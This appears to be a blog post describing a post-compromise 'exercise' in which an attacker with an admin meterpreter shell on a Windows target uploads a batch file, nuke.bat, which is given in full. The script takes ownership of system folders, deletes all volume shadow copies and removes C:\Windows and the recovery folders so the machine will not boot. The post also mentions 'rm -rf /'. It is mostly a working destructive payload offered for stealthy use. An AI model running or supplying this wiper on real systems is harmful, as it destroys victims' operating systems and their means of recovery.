For todays exercise I have created a scenario where the target Windows system needs to be nuked after a successful compromise so that it cannot boot back to windows. Being a Linux user I have always liked a possibility to nuke the mounted root partition by a simple single command like “rm -rf / “. After all it is my system and I can zap it whenever I want to. In windows it is a little harder and I am sure there are tons of howtos available on the Internet. I needed something stealthy which would run via meterpreter shell in the background of the target windows box. So obviously nuking the users files is not a good idea. We just want to make sure that upon next reboot the machine will barf up a “Black screen of Death”.
So we have “bypassed” all the pesky AVs and have a nice admin shell
Next we upload the following batch to the target system, lets call it nuke.bat
@echo off echo Taking ownership.... takeown /f c:\* >nul 2>nul takeown /f %windir%\* >nul 2>nul takeown /f %windir%\system32 >nul 2>nul takeown /f %windir%\system32\* >nul 2>nul takeown /f %windir%\system32\drivers >nul 2>nul takeown /f %windir%\system32\drivers\* >nul 2>nul takeown /f c:\recovery >nul 2>nul takeown /f c:\recovery\* >nul 2>nul takeown /f c:\perflogs >nul 2>nul takeown /f c:\perflogs\* >nul 2>nul takeown /f "c:\system volume information\" >nul 2>nul takeown /f "c:\system volume information\*" >nul 2>nul icacls c:\* /grant administrators:f /t >nul 2>nul icacls %windir% /grant administrators:f /t >nul 2>nul icacls %windir%\* /grant administrators:f /t >nul 2>nul icacls %windir%\system32 /grant administrators:f /t >nul 2>nul icacls %windir%\system32\* /grant administrators:f /t >nul 2>nul icacls %windir%\system32\drivers /grant administrators:f /t >nul 2>nul icacls %windir%\system32\drivers\* /grant administrators:f /t >nul 2>nul icacls c:\recovery /grant administrators:f /t >nul 2>nul icacls c:\recovery\* /grant administrators:f /t >nul 2>nul icacls c:\perflogs /grant administrators:f /t >nul 2>nul icacls c:\perflogs\* /grant administrators:f /t >nul 2>nul icacls "c:\system volume information\" /grant administrators:f /t >nul 2>nul icacls "c:\system volume information\*" /grant administrators:f /t >nul 2>nul echo Nuking system files... vssadmin delete shadows /All /Quiet >nul 2>nul vssadmin delete shadows /All /Quiet >nul 2>nul rmdir c:\PrefLogs /s /q >nul 2>nul rmdir c:\Recovery /s /q >nul 2>nul rmdir "C:\System Volume Information" /s /q >nul 2>nul rmdir c:\Windows /s /q >nul 2>nul echo Done
You need admin privileges for this to work and remember that it will nuke the System !
This operation takes some time maybe around 2 minutes, the HDD will be working really hard to process all those files, but in Windows all looks fine and the system seems to be running fine…
But when we reboot…
Windows cannot fix itself from the recovery console and it wont be able to restore any snapshots as we have deleted them from the batch command. The user files are left intact, there is no need nuke those.
I still prefer the rm -rf / from my linux box though, windows version is much more cumbersome, but maybe there is some magic one-liner in powershell perhaps ?
